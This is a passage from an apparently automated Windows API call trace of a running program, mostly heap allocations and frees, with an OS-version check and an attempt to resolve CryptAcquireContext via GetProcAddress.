lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0254.715] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0254.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0254.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.715] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0254.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0254.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0254.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0254.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0254.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.716] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0254.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0254.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0254.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0254.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0254.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0254.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0254.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0254.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0254.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0254.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0254.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.717] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0254.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0254.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0254.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0254.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0254.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0254.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0254.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0254.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.718] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0254.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0254.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0254.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0254.719] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0254.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0254.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e10 [0254.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0254.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0254.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0254.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0254.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0254.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0254.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0254.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0254.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0254.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0254.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0254.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.721] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0254.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0254.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0254.721] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0254.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0254.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0254.721] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0254.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0254.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0254.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0254.722] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0254.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0254.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0254.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0254.722] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0254.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0254.722] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0254.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0254.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0254.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0254.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0254.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0254.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0254.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0254.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0254.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0254.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0254.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0254.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0254.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.725] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0254.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0254.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0254.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0254.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466db0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0254.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.727] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0254.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0254.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0254.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 